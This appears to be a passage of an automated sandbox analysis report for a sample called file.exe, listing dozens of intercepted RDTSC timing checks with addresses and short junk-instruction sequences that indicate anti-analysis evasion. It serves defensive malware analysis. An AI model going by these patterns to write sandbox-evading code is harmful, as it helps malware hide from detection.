            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5207D0 second address: 5207F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F466483F656h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527E06 second address: 527E10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49781D second address: 497822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A96C second address: 52A972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A972 second address: 52A990 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F466483F655h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A990 second address: 52A995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F16B second address: 52F185 instructions: 0x00000000 rdtsc 0x00000002 js 00007F466483F650h 0x00000008 jmp 00007F466483F64Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F466483F646h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F2F2 second address: 52F31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4664873C18h 0x0000000b popad 0x0000000c popad 0x0000000d jc 00007F4664873C12h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F9D3 second address: 52F9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F466483F657h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531381 second address: 5313A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4664873C06h 0x0000000a push ecx 0x0000000b jg 00007F4664873C06h 0x00000011 jmp 00007F4664873C16h 0x00000016 pop ecx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5355DA second address: 5355DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5355DF second address: 5355E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5355E4 second address: 5355EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535B9D second address: 535BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E444E second address: 4E445F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535E1D second address: 535E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535E21 second address: 535E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F466483F658h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535E3F second address: 535E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535E44 second address: 535E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F466483F64Dh 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535E5A second address: 535E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4664873C06h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0020 second address: 4A0052 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F466483F646h 0x00000008 jmp 00007F466483F651h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jc 00007F466483F64Ah 0x0000001d push edi 0x0000001e pop edi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0052 second address: 4A005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4664873C06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A005E second address: 4A006B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F466483F64Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540BB9 second address: 540BBE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540BBE second address: 540BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540BC4 second address: 540BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F4664873C0Eh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54146D second address: 54147F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F466483F646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F466483F64Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54147F second address: 541483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54172F second address: 541737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541737 second address: 54173C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54173C second address: 541742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541742 second address: 541748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541748 second address: 54174C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5419DB second address: 541A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jo 00007F4664873C06h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 push edi 0x00000012 jns 00007F4664873C06h 0x00000018 pop edi 0x00000019 jno 00007F4664873C0Ah 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4664873C13h 0x00000027 jmp 00007F4664873C0Fh 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541FD7 second address: 542010 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F466483F650h 0x00000012 popad 0x00000013 jmp 00007F466483F64Ch 0x00000018 popad 0x00000019 js 00007F466483F658h 0x0000001f push eax 0x00000020 push edx 0x00000021 jbe 00007F466483F646h 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546CB0 second address: 546CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4664873C06h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4664873C13h 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546CD6 second address: 546CDD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549D64 second address: 549D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549D68 second address: 549D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549D73 second address: 549D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549ED5 second address: 549EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549EDB second address: 549EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A466 second address: 54A470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A470 second address: 54A476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A476 second address: 54A486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007F466483F64Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550882 second address: 550893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4664873C0Ah 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550893 second address: 55089B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5509FF second address: 550A23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F4664873C22h 0x0000000c jmp 00007F4664873C16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550B64 second address: 550B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F466483F646h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550B75 second address: 550B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F4664873C0Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550B94 second address: 550B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550D22 second address: 550D48 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F4664873C0Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F4664873C06h 0x00000018 jnc 00007F4664873C06h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550D48 second address: 550D54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007F466483F646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550D54 second address: 550D6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551035 second address: 551039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551039 second address: 55103D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55103D second address: 551043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551043 second address: 55106A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4664873C0Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4664873C13h 0x0000000f jc 00007F4664873C06h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5511D0 second address: 5511E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F466483F646h 0x0000000a jmp 00007F466483F64Ah 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55134D second address: 551367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F4664873C13h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551367 second address: 55136C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552134 second address: 55213E instructions: 0x00000000 rdtsc 0x00000002 je 00007F4664873C06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A6DC second address: 55A6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A6E4 second address: 55A6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A6EA second address: 55A701 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F466483F646h 0x00000008 jmp 00007F466483F64Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A701 second address: 55A707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A707 second address: 55A70B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A85C second address: 55A860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C0EA second address: 55C12A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F657h 0x00000007 jno 00007F466483F65Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F466483F646h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C12A second address: 55C12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568FE8 second address: 56901F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F466483F660h 0x00000008 push esi 0x00000009 jmp 00007F466483F64Ch 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56901F second address: 569045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F4664873C19h 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569045 second address: 56904B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56904B second address: 569057 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569057 second address: 56905D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AF6B second address: 56AF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AC43 second address: 56AC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AC48 second address: 56AC50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AC50 second address: 56AC54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E5C6 second address: 56E5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4664873C0Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DFE6 second address: 56DFEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E159 second address: 56E15D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E15D second address: 56E163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 575DAE second address: 575DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 575DB6 second address: 575DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F466483F646h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F466483F652h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578AB0 second address: 578AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4664873C10h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578AC5 second address: 578AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F466483F652h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578AE0 second address: 578AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578AF2 second address: 578B00 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F466483F646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578B00 second address: 578B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578B04 second address: 578B1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F466483F651h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E61D second address: 57E621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E621 second address: 57E63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F466483F650h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop esi 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E63B second address: 57E641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E641 second address: 57E645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58481C second address: 584828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4664873C06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 584828 second address: 58482C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58482C second address: 584830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 584830 second address: 584861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F466483F64Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F466483F656h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 584861 second address: 584867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 584867 second address: 584884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F466483F658h 0x00000009 popad 0x0000000a rdtsc
